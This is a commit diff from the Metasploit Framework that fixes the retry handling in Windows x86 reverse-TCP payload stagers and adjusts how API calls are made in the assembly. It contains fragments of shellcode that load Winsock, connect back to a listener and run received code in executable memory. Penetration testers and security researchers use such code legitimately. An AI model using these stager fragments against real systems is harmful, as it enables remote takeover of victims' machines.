Fix rapid7#9090, honoring retry counts for x86/64 payloads

wchen-r7 · wchen-r7 · commit 6fe8691528a0 · 2018-02-15T13:52:34.000-06:00
Fix rapid7#9090
diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -125,7 +125,8 @@ def asm_reverse_tcp(opts={})
         push 'ws2_'             ; ...
         push esp                ; Push a pointer to the "ws2_32" string on the stack.
         push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
-        call ebp                ; LoadLibraryA( "ws2_32" )
+        mov eax, ebp
+        call eax                ; LoadLibraryA( "ws2_32" )
 
         mov eax, 0x0190         ; EAX = sizeof( struct WSAData )
         sub esp, eax            ; alloc some space for the WSAData structure
@@ -298,7 +299,8 @@ def asm_block_recv(opts={})
         dec [esp]               ; decrement the counter
 
         ; try again
-        jmp create_socket
+        jnz create_socket
+        jmp failure
       ^
     end
 
diff --git a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb
@@ -142,7 +142,8 @@ def asm_block_recv_rc4(opts={})
         dec [esp]               ; decrement the counter
 
         ; try again
-        jmp create_socket
+        jnz create_socket
+        jmp failure
       ^
     end
 
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
@@ -1633,7 +1633,6 @@ def self.generate_nops(framework, arch, len, opts = {})
   # target code there, setting an exception handler that calls ExitProcess
   # and finally executing the code.
   def self.win32_rwx_exec(code)
-
     stub_block = %Q^
     ; Input: The hash of the API to call and all its parameters must be pushed onto stack.
     ; Output: The return value from the API call will be in EAX.
@@ -1741,7 +1740,8 @@ def self.win32_rwx_exec(code)
     exitfunk:
       mov ebx, 0x0A2A1DE0    ; The EXITFUNK as specified by user...
       push 0x9DBD95A6        ; hash( "kernel32.dll", "GetVersion" )
-      call ebp               ; GetVersion(); (AL will = major version and AH will = minor version)
+      mov eax, ebp
+      call eax               ; GetVersion(); (AL will = major version and AH will = minor version)
       cmp al, byte 6         ; If we are not running on Windows Vista, 2008 or 7
       jl goodbye             ; Then just call the exit function...
       cmp bl, 0xE0           ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...

Original file line number	Diff line number	Diff line change
`@@ -142,7 +142,8 @@ def asm_block_recv_rc4(opts={})`
`142`	`142`	`dec [esp] ; decrement the counter`
`143`	`143`
`144`	`144`	`; try again`
`145`		`- jmp create_socket`
	`145`	`+ jnz create_socket`
	`146`	`+ jmp failure`
`146`	`147`	`^`
`147`	`148`	`end`
`148`	`149`